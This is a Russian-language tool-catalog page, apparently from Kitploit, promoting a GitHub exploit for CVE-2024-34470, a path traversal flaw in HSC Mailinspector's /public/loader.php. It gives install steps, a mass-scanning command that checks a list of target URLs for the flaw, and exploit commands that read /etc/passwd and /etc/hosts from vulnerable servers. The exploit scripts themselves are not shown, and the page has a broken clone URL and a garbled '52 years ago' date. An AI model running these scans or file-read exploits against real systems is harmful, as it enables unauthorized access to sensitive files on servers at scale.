Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-34470 — Критическая уязвимость была обнаружена в HSC Mailinspector до версии 5.2.18. Эта уязвимость затрагивает неизвестную функциональность файла /public/loader.php. | Kitploit
Инструменты/GitHubGitHub/mr-r00t11/cve-2024-34470
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubmr-r00t11/cve-2024-34470

CVE-2024-34470

Критическая уязвимость была обнаружена в HSC Mailinspector до версии 5.2.18. Эта уязвимость затрагивает неизвестную функциональность файла /public/loader.php.

Репозиторий
52 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

HSC MailInspector - CVE-2024-34470


Критическая уязвимость была обнаружена в HSC Mailinspector до версии 5.2.18. Эта уязвимость затрагивает неизвестную функциональность файла /public/loader.php. Манипулирование аргументом 'path' с неизвестным вводом приводит к уязвимости обхода пути (path traversal). Согласно CWE, эта проблема классифицируется как CWE-22. Продукт использует внешний ввод для создания пути, предназначенного для идентификации файла или каталога, находящегося под ограниченным родительским каталогом, но продукт не корректно нейтрализует специальные элементы в пути, которые могут привести к разрешению пути за пределами ограниченного каталога. Это влияет на конфиденциальность, целостность и доступность.


Установка

Клонирование репозитория:

root@kitploit:~
git clone https://CVE-2024-34470.git
cd CVE-2024-34470

Установка зависимостей

Убедитесь, что у вас установлены Python и pip. Затем выполните:

root@kitploit:~
pip install -r requirements.txt
  • Это установит все необходимые зависимости для запуска скрипта.

Использование

Описание скрипта

Для поиска по нескольким целям с помощью текстового файла используйте скрипт Massive_CVE-2024-34470.py

root@kitploit:~
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null

Формат, в котором должен быть файл urls.txt, следующий:

root@kitploit:~
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443

[Screenshot_1.png]


После того как уязвимые цели были идентифицированы, мы используем скрипт CVE-2024-34470.py для эксплуатации и отображения указанного содержимого через терминал.

root@kitploit:~
# Read file content passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null

# Read file content hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts

[screenshot_2.png]

Скачать инструмент